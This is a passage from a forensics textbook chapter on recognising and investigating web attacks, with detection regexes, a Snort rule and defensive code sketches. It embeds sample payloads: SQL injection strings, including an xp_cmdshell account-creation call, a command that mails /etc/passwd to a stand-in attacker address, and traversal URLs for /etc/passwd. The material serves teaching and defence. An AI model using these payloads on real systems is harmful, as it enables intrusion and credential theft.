Computer Forensics: Investigating Network Intrusions and Cybercrime (CHFI) (2016)

Chapter 3

Investigating Web Attacks

Objectives

After completing this chapter, you should be able to:

• Recognize the indications of a Web attack

• Understand the different types of Web attacks

• Understand and use Web logs

• Investigate Web attacks

• Investigate FTP servers

• Investigate IIS logs

• Investigate Web attacks in Windows-based servers

• Recognize Web page defacement

• Investigate DNS poisoning

• Investigate static and dynamic IP addresses

• Protect against Web attacks

• Use tools for Web attack investigations

Key Terms

Uniform Resource Locator (URL): an identifier string that indicates where a resource is located and the mechanism needed to retrieve it

Introduction to Investigating Web Attacks

This chapter will discuss the various types of attacks on Web servers and applications. It will cover how to recognize and investigate attacks, what tools attackers use, and how to proactively defend against attacks.


Indications of a Web Attack

Each type of attack has its own indications. Common ones include the following:

• Customers being unable to access any online services (possibly due to a denial-of-service attack)

• Correct URLs redirecting to incorrect sites

• Unusually slow network performance

• Frequent rebooting of the server

• Anomalies in log files

• Error messages such as 500 errors, “internal server error,” and “problem processing your request”

Types of Web Attacks

The different types of Web attacks covered in this chapter are the following:

• Cross-site scripting (XSS) attack

• Cross-site request forgery (CSRF)

• SQL injection

• Code injection

• Command injection

• Parameter tampering

• Cookie poisoning

• Buffer overflow

• Cookie snooping

• DMZ protocol attack

• Zero-day attack

• Authentication hijacking

• Log tampering

• Directory traversal

• Cryptographic interception

• URL interpretation

• Impersonation attack

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is an application-layer attack against Web applications. It occurs when a dynamic Web page receives malicious data from the attacker and that data is then executed on the user’s system.

Web sites that create dynamic pages do not have control over how their output is read by the client; thus, attackers can insert malicious JavaScript, VBScript, ActiveX, HTML, or Flash content into a vulnerable dynamic page. The page then delivers the script to the user’s browser, which executes it and can collect information about the user.

XSS attacks can be either stored or reflected. In a stored attack, the inserted code is stored permanently on the target server, for example in a database, message forum, or visitor log. In a reflected attack, the code reaches the victim in a different way, such as via an e-mail message. When the user submits a form or clicks a link, the malicious code is sent to the vulnerable Web server, which reflects it back in its response. The browser then executes that code because it believes that the code came from a trusted server.

With this attack, attackers can collect personal information, steal cookies, redirect users to unexpected Web pages, or execute any malicious code on the user’s system.


Investigating Cross-Site Scripting (XSS)

An XSS attacker may use HTML tags such as <b> (bold), <i> (italic), and <script> when attacking a dynamic Web page. To hide the code, the attacker may replace the literal characters with their hex equivalents. For instance, the hex equivalent of “<script>” is “%3C%73%63%72%69%70%74%3E.”

The following regular expression is a way to detect such types of attack:

/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix

It checks for the HTML opening and closing angle brackets (“<” and “>”, or their hex equivalents) and the alphanumeric text between them, so it catches <b>, <i>, and <script> tags, as well as closing tags such as </script>.

Table 3-1 shows how this expression works.

An administrator can also use the following Snort signature to detect this type of attack:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)

An XSS attack can also occur through the “<img src” technique, which the above Snort signature is unable to catch because the space after “img” stops the alphanumeric match before the closing bracket is reached. The following regular expression may be used to check for this type of attack:

/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/i

Table 3-2 shows how this expression works.

The following, broader regular expression checks for an opening angle bracket, followed by one or more characters other than a new line, followed by a closing angle bracket:

/((\%3C)|<)[^\n]+((\%3E)|>)/i
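The three expressions above can be tried against sample input before they are deployed. The following Python sketch is a minimal illustration under stated assumptions: Python’s re module is assumed to behave like PCRE for these particular patterns, the /i modifier is expressed as re.IGNORECASE, and the function name classify and the sample values are made up for the example.

```python
import re

# The three detection patterns from the text; /i becomes re.IGNORECASE.
SIMPLE_TAG = re.compile(r"((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)", re.IGNORECASE)
IMG_TAG = re.compile(
    r"((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)",
    re.IGNORECASE,
)
ANY_TAG = re.compile(r"((\%3C)|<)[^\n]+((\%3E)|>)", re.IGNORECASE)


def classify(value):
    """Return the sorted names of the patterns that match a request parameter."""
    patterns = {"simple_tag": SIMPLE_TAG, "img_tag": IMG_TAG, "any_tag": ANY_TAG}
    return sorted(name for name, pattern in patterns.items() if pattern.search(value))


# Hypothetical parameter values, not taken from real traffic.
for sample in ["%3C%73%63%72%69%70%74%3E", "<img src=x onerror=alert(1)>", "hello world"]:
    print(repr(sample), classify(sample))
```

The broadest pattern also matches harmless text such as “x < 3 and y > 2”, so on its own it is likely to raise false positives.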

Cross-Site Request Forgery (CSRF)

In CSRF Web attacks, an attacker forces the victim to submit the attacker’s form data to the victim’s Web server.

The attacker creates a hosted form containing malicious information and sends it to an authenticated user.

The user fills in the form and sends it to the server. Because the data is coming from a trusted user, the Web server accepts the data.

((\%3C)|<)          Checks for the opening angle bracket
((\%2F)|\/)*        Checks for the forward slash (zero or more, as in a closing tag)
[a-z0-9\%]+         Checks for an alphanumeric string inside the tag
((\%3E)|>)          Checks for the closing angle bracket

Table 3-1 These parts of the expression check for various characters and their hex equivalents

((\%3C)|<)          Checks for the opening angle bracket
((\%69)|i|(\%49))   Checks for the letters “img”, in either case and either plain or hex-encoded
((\%6D)|m|(\%4D))
((\%67)|g|(\%47))
[^\n]+              Checks for any character other than a new line following the “<img”
((\%3E)|>)          Checks for the closing angle bracket

Table 3-2 This regular expression is helpful in catching “<img src” attacks


Anatomy of a CSRF Attack

A CSRF attack proceeds in the following four steps:

1. The attacker hosts a Web page with a form that looks legitimate. This page already contains the attacker’s request.

2. A user, believing this form to be the original, enters a login and password.

3. Once the user completes the form, that page gets submitted to the real site.

4. The real site’s server accepts the form, assuming that it was sent by the user based on the authentication credentials.

In this way, the server accepts the attacker’s request.

Pen-Testing CSRF Validation Fields

Before a form is put into use, it is necessary to confirm that its submissions are validated before the server acts on them. The best way to do this is by pen-testing the CSRF validation field, which can be done in the following four ways:

1. Confirm that the validation field is unique for each user.

2. Make sure that another user cannot identify or predict the validation field.

• If an attacker can create the same validation field as another user, then the validation field provides no protection.

• The validation field must be unique for each site.

3. Make sure that the validation field is never sent on the query string, because this data could be leaked to the attacker in places like the HTTP Referer header.

4. Verify that the request fails if the validation field is missing.
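The four checks above can be illustrated with a minimal Python sketch of a server-side token scheme. This is one possible design, not the only one: it assumes each token is an HMAC of the session ID under a per-site secret key, and the names SITE_KEY, issue_token, is_request_valid, and the csrf_token field are hypothetical.

```python
import hashlib
import hmac
import secrets

# Hypothetical per-site secret. A different site would use a different key,
# so its tokens would differ as well.
SITE_KEY = secrets.token_bytes(32)


def issue_token(session_id):
    """Check 1: derive a token tied to one user's session."""
    return hmac.new(SITE_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_valid(session_id, form_fields, query_params):
    """Apply checks 2 to 4 to an incoming state-changing request."""
    # Check 3: a token on the query string could leak via the Referer header.
    if "csrf_token" in query_params:
        return False
    submitted = form_fields.get("csrf_token")
    # Check 4: the request must fail if the validation field is missing.
    if not submitted:
        return False
    # Check 2: without SITE_KEY, an attacker cannot predict another user's token.
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(issue_token(session_id).encode(), submitted.encode())
```

A pen tester would expect a token copied from one session to be rejected in another session, and a form posted without the field, or with the token on the query string, to fail.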

SQL Injection Attacks

An SQL injection attack occurs when an attacker passes malicious SQL code to a Web application. It targets the data residing behind an application by manipulating its database. In this attack, user input is placed into an SQL query without being validated for correct formatting or checked for embedded escape strings. It has been known to affect the majority of applications that use a database back end and do not enforce variable types. According to an IBM study, SQL injection replaced cross-site scripting as the predominant Web application vulnerability in 2008. The IBM security researchers who conducted the study reported that a new SQL injection attack affected at least half a million Web sites in 2008 and was more resistant to traditional security measures than previous versions. SQL injection vulnerabilities are usually caused by improper input validation in CFML, ASP, JSP, and PHP code, typically when developers use string-building techniques to construct and execute SQL statements.

For example, in a search page, the developer may use the following VBScript/ASP code to execute a query:

Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText = '" & request.form("inputdata") & "'")

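Notice what happens if the user enters the string “blah' or 1=1 --” into the form. The application builds and executes the following statement:

SELECT * FROM myTable WHERE someText = 'blah' or 1=1 --'

The injected quote closes the string literal, the condition 1=1 makes the WHERE clause always evaluate as true, and the -- sequence comments out the trailing quote. The query therefore returns every record in the table.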
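The difference between string building and a parameterized query can be reproduced with Python’s built-in sqlite3 module. In this sketch, SQLite stands in for whatever database the original application used, the table and column names follow the VBScript example, and the three rows are made-up data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE myTable (someText TEXT)")
conn.executemany("INSERT INTO myTable VALUES (?)", [("apple",), ("banana",), ("cherry",)])


def search_unsafe(text):
    # String building, as in the VBScript example: the input becomes part of the SQL.
    query = "SELECT * FROM myTable WHERE someText = '" + text + "'"
    return conn.execute(query).fetchall()


def search_safe(text):
    # Parameterized query: the driver passes the input as data, never as SQL.
    return conn.execute("SELECT * FROM myTable WHERE someText = ?", (text,)).fetchall()


payload = "blah' or 1=1 --"
print(len(search_unsafe(payload)))  # every row is returned
print(search_safe(payload))         # no row contains this literal text
```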

Investigating SQL Injection Attacks

The following are the three locations to look for evidence of SQL injection attacks:

1. IDS log files: IDS logs can help to identify attack trends and patterns that assist in determining security holes where most attacks are attempted. In addition, administrators can retrieve information related to any possible security holes or policy oversights, and any servers on the network that have a higher risk of being attacked.

2. Database server log files: These log files record the statements and transactions processed by the database, and they enable recovery in the event that the database needs to be restored.

3. Web server log files: Web server log files help in understanding how, when, and by whom Web site pages, files, and applications are being accessed.


An attack signature may look like this in a Web server log file:

12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --
12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or )1=1 (--
12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or exec master..xp_cmdshell 'net user test testpass --
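An investigator can search Web server logs for entries like these with a simple pattern. The Python sketch below uses a deliberately small, hypothetical signature (a quote followed by OR or AND, an SQL comment marker, or SQL Server’s exec and xp_cmdshell). It is an illustration rather than a production IDS rule, and legitimate traffic containing “--” would also be flagged.

```python
import re
from urllib.parse import unquote

# Hypothetical signature: quote + OR/AND, an SQL comment, or exec/xp_cmdshell.
SQLI_SIGNATURE = re.compile(r"'\s*(or|and)\b|--|\bexec\b|xp_cmdshell", re.IGNORECASE)


def find_sqli(lines):
    """Return (line_number, matched_text) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        # Decode %27 and similar escapes so encoded quotes are caught too.
        match = SQLI_SIGNATURE.search(unquote(line))
        if match:
            hits.append((number, match.group(0)))
    return hits


LOG = [
    "12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --",
    "12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or )1=1 (--",
    "12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or exec master..xp_cmdshell 'net user test testpass --",
    "12:34:40 192.2.3.5 GET /login.asp?username=alice",  # hypothetical benign entry
]
for number, text in find_sqli(LOG):
    print(number, text)
```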

Code Injection Attack

A code injection attack is similar to an SQL injection attack. In this attack, an attacker adds malicious code, such as shell commands or PHP scripts, to the input that an application sends to the server.

When the server receives the request, it executes the injected code along with the application. The main goal of this attack is to bypass or modify the original program in order to execute arbitrary code and gain access to restricted Web sites or databases, including those with personal information such as credit card numbers and passwords.

For example, consider that the server has a “Guestbook” script, and the user sends short messages to the server, such as:

This site is great!

An attacker could insert code into the Guestbook message, such as:

; cat /etc/passwd | mail attacker@attacker.com #

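If the Guestbook script passes the message to a shell, the semicolon ends the script’s own command, the injected command e-mails the password file to the attacker, and the # turns the rest of the line into a comment.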
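To see why the payload works, assume, hypothetically, that the Guestbook script appends each message to a file by building a shell command such as echo MESSAGE >> guestbook.txt. The Python sketch below uses the shlex module only to show how a POSIX-style shell would split each command into words; nothing is executed, and shlex is not a full shell parser. Avoiding the shell altogether is the more robust fix; quoting is shown here because it is the smallest change to the hypothetical script.

```python
import shlex

PAYLOAD = "; cat /etc/passwd | mail attacker@attacker.com #"


def build_command_unsafe(message):
    # Hypothetical guestbook command built by string concatenation.
    return "echo " + message + " >> guestbook.txt"


def build_command_safe(message):
    # shlex.quote wraps the message so the shell sees it as one literal word.
    return "echo " + shlex.quote(message) + " >> guestbook.txt"


# comments=True makes shlex treat an unquoted "#" as the start of a comment.
unsafe_tokens = shlex.split(build_command_unsafe(PAYLOAD), comments=True)
safe_tokens = shlex.split(build_command_safe(PAYLOAD), comments=True)
print(unsafe_tokens)
print(safe_tokens)
```

In the unsafe version, the semicolon and pipe appear as standalone words that a shell would treat as operators, and the # swallows the >> guestbook.txt redirection. In the safe version, the whole message is a single argument to echo.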

Investigating Code Injection Attacks

One way to detect code injection attacks combines an intrusion detection system (IDS) with a series of sandbox execution environments provided by the OS. When the IDS finds a series of executable instructions in the network traffic, it transfers the suspicious packets’ payload to the execution environment matching the packets’ destination. The proper execution environment is determined with the help of the destination IP address of the incoming packets.

The packet payload is then executed in the corresponding monitored environment, and a report of the payload’s OS resource usage is passed to the IDS. If the report contains evidence of OS resource usage, the IDS alerts the user that the incoming packet contains malicious data.

Parameter Tampering



Parameter tampering is a type of Web attack that occurs when an attacker changes or modifies the parameters of a URL, as shown in Figure 3-1. A URL (Uniform Resource Locator) is an identifier string that indicates where a resource is located and the mechanism needed to retrieve it. Parameter tampering takes advantage of programmers who rely on hidden or fixed fields, such as a hidden tag in a form or a parameter in a URL, as the only security measure to protect the user’s data. It is very easy for an attacker to modify these parameters.

For example, if the user sends the link

http://www.medomain.co.in/example.asp?accountnumber=1234&debitamount=1,

an attacker may change the URL parameters so it becomes

http://www.medomain.co.in/example.asp?accountnumber=34291&creditamount=9994.
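The defense implied above is that the server must never trust parameters it receives back from the client. The following Python sketch shows one way to re-check the example URL against server-side state. The session table, the allowed parameter set, and the MAX_DEBIT limit are hypothetical values chosen for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical server-side state: which accounts each session may debit.
ACCOUNTS_BY_SESSION = {"session-a": {"1234"}}
ALLOWED_PARAMS = {"accountnumber", "debitamount"}
MAX_DEBIT = 1000  # hypothetical business limit


def is_request_allowed(session_id, url):
    params = parse_qs(urlsplit(url).query)
    # Reject unexpected or repeated parameters (e.g. an injected creditamount).
    if set(params) != ALLOWED_PARAMS or any(len(v) != 1 for v in params.values()):
        return False
    # Never trust the account number in the URL; check it against the session.
    if params["accountnumber"][0] not in ACCOUNTS_BY_SESSION.get(session_id, set()):
        return False
    try:
        amount = int(params["debitamount"][0])
    except ValueError:
        return False
    return 0 < amount <= MAX_DEBIT
```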

Cookie Poisoning

Web applications use cookies to store information such as user IDs, passwords, account numbers, and time stamps, all on the user’s local machine. In a cookie poisoning attack, the attacker modifies the contents of a cookie to steal personal information about a user or defraud Web sites.

For example, consider the following request:

GET /bigstore/buy.asp?checkout=yes HTTP/1.0
Host: www.onshopline.com
Accept: */*
Referer: http://www.onshopline.com/showprods.asp
Cookie: SESSIONID=5435761ASDD23SA2321; Basket Size=6; Item1=2189; Item2=3331; Item3=9462; Total Price=14982;


Figure 3-1 An attacker can change the parameters in a URL to gain unauthorized access.

The above example contains the session ID, which is unique to every user. It also contains the items that a user buys, their prices, and the total price. An attacker could make changes to this cookie, such as changing the total price to create a fraudulent discount.

Investigating Cookie Poisoning Attacks

Cookie poisoning attacks can be detected with intrusion prevention products. These products record each cookie set command issued by the Web server. For every set command, they store information such as the cookie name, cookie value, IP address, time, and the session to which the cookie was assigned.

After this, the intrusion prevention product catches every HTTP request sent to the Web server and compares any cookie information sent with all stored cookies. If an attacker changes the cookie’s contents, they will not match up with stored cookies, and the intrusion prevention product will determine that an attack has occurred.
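The matching logic described above can be sketched in a few lines of Python. This is a simplified, in-memory illustration of the idea, not how any particular intrusion prevention product works. The class and method names are hypothetical, and the cookie values come from the example request.

```python
class CookieTracker:
    """Remember every cookie the server set and compare it with what comes back."""

    def __init__(self):
        # (session_id, cookie_name) -> (value, client_ip, time_set)
        self._issued = {}

    def record_set_cookie(self, session_id, name, value, client_ip, time_set):
        self._issued[(session_id, name)] = (value, client_ip, time_set)

    def check_request(self, session_id, client_ip, cookies):
        """Return the names of cookies that do not match what the server set."""
        suspicious = []
        for name, value in cookies.items():
            issued = self._issued.get((session_id, name))
            # Unknown cookie, changed value, or a different client IP.
            if issued is None or issued[0] != value or issued[1] != client_ip:
                suspicious.append(name)
        return suspicious


tracker = CookieTracker()
sid = "5435761ASDD23SA2321"
tracker.record_set_cookie(sid, "Total Price", "14982", "10.0.0.5", "12:00:00")
print(tracker.check_request(sid, "10.0.0.5", {"Total Price": "100"}))
```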

Buffer Overflow

A buffer is a limited-capacity, temporary data storage area. If a program stores more data in a buffer than it can handle, the buffer will overflow and spill data into a completely different buffer, overwriting or corrupting the data currently in that buffer. During such attacks, the extra data may contain malicious code.

This attack can change data, damage files, or disclose private information. To accomplish a buffer overflow attack, attackers will attempt to overflow back-end servers with excess requests. They then send specially crafted input to execute arbitrary code, allowing the attacker to control the applications. Both the Web application and server products, which act as static or dynamic features of the site, are prone to buffer overflow errors. Buffer overflow vulnerabilities in server products are often publicly known.

Detecting Buffer Overflows

Nebula (NEtwork-based BUffer overfLow Attack detection) detects buffer overflow attacks by monitoring incoming network traffic, without requiring any changes to the end hosts. This technique uses a generalized signature that can capture all known variants of buffer overflow attacks and reduce the number of false positives to a negligible level.


In a buffer overflow attack, the attacker references injected content on the buffer stack. This means that stack addresses will have to be in the attack traffic, so Nebula looks for these stack addresses. If it finds them in incoming traffic, it will report that a buffer overflow attack is occurring.
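The idea of looking for stack addresses in traffic can be illustrated with a toy heuristic. The Python sketch below is not Nebula’s actual algorithm. It assumes a 32-bit little-endian target whose stack lives in the range 0xBF000000 to 0xBFFFFFFF (typical of older 32-bit Linux systems) and flags stack-range values that repeat at least four times. Both the range and the threshold are illustrative assumptions.

```python
import struct
from collections import Counter

# Assumed stack address range and an arbitrary repeat threshold;
# both are illustrative, not Nebula's parameters.
STACK_LOW, STACK_HIGH = 0xBF000000, 0xBFFFFFFF
MIN_REPEATS = 4


def find_stack_addresses(payload):
    """Return {address: count} for stack-range values repeated in the payload."""
    counts = Counter()
    # Slide over every byte offset, reading 4 bytes as a little-endian integer.
    for offset in range(len(payload) - 3):
        (value,) = struct.unpack_from("<I", payload, offset)
        if STACK_LOW <= value <= STACK_HIGH:
            counts[value] += 1
    return {addr: n for addr, n in counts.items() if n >= MIN_REPEATS}


# Hypothetical attack payload: filler followed by a repeated return address.
attack = b"A" * 64 + struct.pack("<I", 0xBFFF1234) * 8
benign = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
print({hex(a): n for a, n in find_stack_addresses(attack).items()})
```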

Cookie Snooping

Cookie snooping is when an attacker steals a victim’s cookies, possibly using a local proxy, and uses them to log on as the victim. Using strongly encrypted cookies and embedding the source IP address in the cookie can prevent this. Cookie mechanisms can be fully integrated with SSL functionality for added security.

DMZ Protocol Attack

Most Web application environments include protocols such as DNS and FTP. These protocols have inherent vulnerabilities that are frequently exploited to gain access to other critical application resources.

The DMZ (demilitarized zone) is a semitrusted network zone that separates the untrusted Internet from the company’s trusted internal network. To enhance the security of the DMZ and reduce risk, most companies limit the protocols allowed to flow through their DMZ. End-user protocols, such as NetBIOS, would introduce a great security risk to the systems and traffic in the DMZ.

Most organizations limit the protocols allowed into the DMZ to the following:

• File Transfer Protocol (FTP) – TCP ports 20, 21

• Simple Mail Transfer Protocol (SMTP) – TCP port 25

• Domain Name System (DNS) – TCP port 53, UDP port 53

• Hypertext Transfer Protocol (HTTP) – TCP port 80

• Hypertext Transfer Protocol Secure (HTTPS) – TCP port 443

Zero-Day Attack

Zero-day attacks exploit previously unknown vulnerabilities, so they are especially dangerous because preventative measures cannot be taken in advance. A substantial amount of time can pass between when a researcher or attacker discovers a vulnerability and when the vendor issues a corrective patch. Until that time, the software is vulnerable, and no patch is available to defend against these attacks. To minimize damage, it is important to apply patches as soon as they are released.

Authentication Hijacking



To identify users, personalize content, and set access levels, many Web applications require users to authenticate. This can be accomplished through basic authentication (user ID and password, as shown in Figure 3-2), or through stronger authentication methods, such as requiring client-side certificates. Stronger authentication may be necessary if nonrepudiation is required.

Authentication is a key component of the authentication, authorization, and accounting (AAA) services that most Web applications use. As such, authentication is the first line of defense for verifying and tracking the legitimate use of a Web application.

One of the main problems with authentication is that every Web application performs authentication in a different way. Enforcing a consistent authentication policy among multiple and disparate applications can prove challenging.

Authentication hijacking can lead to theft of services, session hijacking, user impersonation, disclosure of sensitive information, and privilege escalation. An attacker is able to use weak authentication methods to assume the identity of another user, and is able to view and modify data as the user.

Investigating Authentication Hijacking



First, check whether the Web browser remembers the password. Browsers such as Internet Explorer and Mozilla Firefox ask the user whether to remember the password, as shown in Figure 3-3. If the user chose to do so, the saved password can be stolen.

Another method to check for authentication hijacking is to see if the user forgot to log off after using the application. Obviously, if the user did not log off, the next person to use the system could easily pose as that person.


Figure 3-2 Authentication tells the Web application the user’s identity.

Figure 3-3 Having applications remember passwords can lead to authentication hijacking.

Log Tampering

Web applications maintain logs to track the usage patterns of an application, including user login, administrator login, resources accessed, error conditions, and other application-specific information. These logs are used for proof of transactions, fulfillment of legal record retention requirements, marketing analysis, and forensic incident analysis. The integrity and availability of logs are especially important when nonrepudiation is required.

In order to cover their tracks, attackers will often delete logs, modify logs, change user information, and otherwise destroy evidence of the attack. An attacker who has control over the logs might change the following:

20031201 11:56:54 User login: juser

20031201 12:34:07 Administrator account created: drevil

20031201 12:36:43 Administrative access: drevil

20031201 12:45:19 Configuration file accessed: drevil

...

to:

20031201 11:56:54 User login: juser

20031201 12:50:14 User logout: juser
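A common way to make this kind of tampering detectable, not described in the text itself, is to hash-chain the log entries so that each hash covers the previous one. The Python sketch below illustrates the idea with SHA-256. It only helps if the latest hash is kept somewhere the attacker cannot reach, such as a separate log host, because an attacker with full control over the logs can recompute the whole chain. The function names are hypothetical.

```python
import hashlib

GENESIS = "0" * 64


def chain_entries(entries):
    """Pair each log entry with a SHA-256 hash over the previous hash and the entry."""
    chained, previous = [], GENESIS
    for entry in entries:
        digest = hashlib.sha256((previous + "\n" + entry).encode()).hexdigest()
        chained.append((entry, digest))
        previous = digest
    return chained


def first_broken_link(chained):
    """Return the index of the first entry whose hash does not verify, or None."""
    previous = GENESIS
    for index, (entry, digest) in enumerate(chained):
        if hashlib.sha256((previous + "\n" + entry).encode()).hexdigest() != digest:
            return index
        previous = digest
    return None


original = [
    "20031201 11:56:54 User login: juser",
    "20031201 12:34:07 Administrator account created: drevil",
    "20031201 12:36:43 Administrative access: drevil",
    "20031201 12:45:19 Configuration file accessed: drevil",
]
chained = chain_entries(original)
print(first_broken_link(chained))  # None: the untouched log verifies
```

If the attacker replaces the entries without recomputing the hashes, verification fails at the first edited entry. If the attacker recomputes the chain, its final hash no longer matches the copy stored off the server.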


Directory Traversal

Complex applications consist of many separate components and data, which are typically stored in multiple directories. An application has the ability to traverse these multiple directories to locate and execute its different portions. A directory traversal attack, also known as a forceful browsing attack, occurs when an attacker is able to browse for directories and files outside normal application access. This exposes the directory structure of an application, and often the underlying Web server and operating system. With this level of access to the Web application architecture, an attacker can do the following:

• Enumerate the contents of files and directories

• Access pages that otherwise require authentication (and possibly payment)

• Gain secret knowledge of the application and its construction

• Discover user IDs and passwords buried in hidden files

• Locate the source code and other hidden files left on the server

• View sensitive data, such as customer information

The following example uses ../ to back up several directories and obtain a file containing a backup of the Web application:

http://www.targetsite.com/../../../sitebackup.zip

The following example obtains the /etc/passwd file from a UNIX/Linux system, which contains user account information:

http://www.targetsite.com/../../../../etc/passwd
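On the server side, requests like these can be rejected by normalizing the requested path and confirming that it still lies inside the document root. The Python sketch below assumes a UNIX-style document root at the hypothetical path /var/www/site. It works purely on strings, so it does not resolve symbolic links (os.path.realpath on the real file system would be needed for that), and it does not handle Windows backslash separators.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/site"  # hypothetical document root


def resolve_request_path(requested):
    """Map a requested URL path to a file under WEB_ROOT, or None if it escapes."""
    decoded = unquote(requested)  # catch %2e%2e/ as well as ../
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    # After normalization, the path must still sit inside the document root.
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


for path in ["/images/logo.png", "/../../../sitebackup.zip", "/../../../../etc/passwd"]:
    print(path, "->", resolve_request_path(path))
```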

Cryptographic Interception

Attackers rarely attempt to break strong encryption such as Secure Sockets Layer (SSL), which supports various kinds of cryptographic algorithms that are not easily pierced. Instead, attackers target sensitive handoff points where data is temporarily unprotected, such as misdirected trust of any system, misuse of security mechanisms, any kind of implementation deviation from application specifications, and any oversights and bugs.

Every Web application has at least some sensitive data that must be protected to ensure that confidentiality and integrity are maintained. Sensitive data is often protected in Web applications through encryption. Company policies and legislation often mandate the required level of cryptographic protection.

Using cryptography, a secret message can be securely sent between two parties. Today’s complex Web applications and infrastructures typically involve many different control points where data is encrypted and decrypted. In addition, every system that encrypts or decrypts the message must have the necessary secret keys and the ability to protect those secret keys. The disclosure of private keys and certificates gives an attacker the ability to read and modify a hitherto private communication. The use of cryptography and SSL should be carefully considered, because encrypted traffic passes through network firewalls and IDSs uninspected. In this way, an attacker has a secure encrypted tunnel from which to attack the Web application.

An attacker able to intercept cryptographically secured messages can read and modify sensitive, encrypted data. Using captured private keys and certificates, a man-in-the-middle attacker can wreak havoc with security, often without making the end parties aware of what is happening.

URL Interpretation Attack

A URL interpretation attack is when an attacker takes advantage of different methods of text encoding, abusing the interpretation of a URL. Because Web traffic is usually interpreted as “friendly,” it comes in unfiltered.

It is the most commonly used traffic allowed through firewalls. The URLs used for this type of attack typically contain special characters that require special syntax handling for interpretation. Special characters are often represented by the percent character followed by two digits representing the hexadecimal code of the original character, i.e., %<hex code>. By using these special characters, an attacker may inject malicious commands or content, which is then executed by the Web server. An example of this type of attack is HTTP response splitting. The attacker places encoded carriage-return and line-feed characters (%0d%0a) in a request parameter that the server copies into a response header, which splits the server’s single response into two. The attacker controls the content of the second response, so this forged data is sent back to the target, appearing as if it came directly from the Web server.
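Because the attack relies on %<hex code> escapes, filters should inspect values only after decoding them, and sometimes more than once, since double encoding (for example %253C, which decodes to %3C and then to “<”) is a common evasion. The Python sketch below decodes a value until it stops changing and flags carriage-return or line-feed characters that could split a response header. The function names and the sample parameter values are hypothetical.

```python
from urllib.parse import unquote


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%253C) is revealed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def allows_header_injection(value):
    """Flag values that would insert CR or LF if copied into a response header."""
    decoded = fully_decode(value)
    return "\r" in decoded or "\n" in decoded


print(fully_decode("%253Cscript%253E"))
print(allows_header_injection("en%0d%0aSet-Cookie:%20admin=1"))
```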


Impersonation Attack

An impersonation attack is when an attacker spoofs Web applications by pretending to be a legitimate user. In this case, the attacker enters the session through a common port as a normal user, so the firewall does not detect it. Servers can be vulnerable to this attack due to poor session management coding.

Session management is a technique that uses sessions to track information. Web developers do this to provide transparent authorization for every HTTP request without asking the user to log in every time.

Sessions are similar to cookies in that they exist only until they are destroyed. Once the session is destroyed, the browser ceases all tracking until a new session is started on the Web page. For example, suppose Mr. A is a legitimate user and Mr. X is an attacker. Mr. A browses to an e-commerce Web application and provides his username and password, gaining legitimate access to the information, such as his bank account data. Now, Mr. X browses to the same application and enters the application through a common port (such as port 80 for HTTP) as a legitimate user does. Then, using the built-in session management, he tricks the application into thinking he is Mr. A and gains control over Mr. A’s account.

Overview of Web Logs

The source, nature, and time of attack can be determined by analyzing the log files of the compromised system.

A Windows Server 2003 system has the following logs:

• Application log, storing events related to the applications running on the server

• Security log, storing events related to audits

• System log, storing events related to Windows components and services

• Directory Service log, storing Active Directory diagnostic and error information

• File Replication Service log, storing Active Directory file replication events

• Service-specific logs, storing events related to specific services or applications

Web server log files record an HTTP status code for each request, and these codes can point to specific types of incidents. Status codes are specified in HTTP and are common to all Web servers. Status codes are three-digit numbers where the first digit identifies the class of response. Status codes are classified into five categories, as shown in Table 3-3.

It is not necessary to understand the definition of specific HTTP status codes as much as it is important to understand the class of the status codes. Any status codes of one class should be treated the same way as any others of that class.

Log Security

Web servers that run on IIS or Apache run the risk of log file deletion by any attacker who has access to the Web server because the log files are stored on the Web server itself.

Network logging is the preferred method for maintaining the logs securely. A network IDS can collect active requests on the network, but it falls short with SSL requests: because that traffic is encrypted, attackers using HTTPS cannot be recognized by the IDS. Proxy servers capture detailed information about each request, which is extremely valuable for investigating Web attacks.

Status Code    Description
1XX            Continue or request received
2XX            Success
3XX            Redirection
4XX            Client error
5XX            Server error

Table 3-3 Status codes are three-digit numbers divided into five categories

Log File Information

When investigating log files, the information is stored in a simple format with the following fields:

• Time/date

• Source IP address

• HTTP status code

• Requested resource
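Extracting these four fields is usually the first step in any log analysis. The Python sketch below assumes the log is in Apache’s Common Log Format, which is covered later in this chapter; IIS logs use a different layout. The sample line is hypothetical, and the status_class helper maps a code to its class from Table 3-3.

```python
import re
from datetime import datetime

# Common Log Format: host ident user [time] "request" status bytes
CLF_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<resource>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_clf_line(line):
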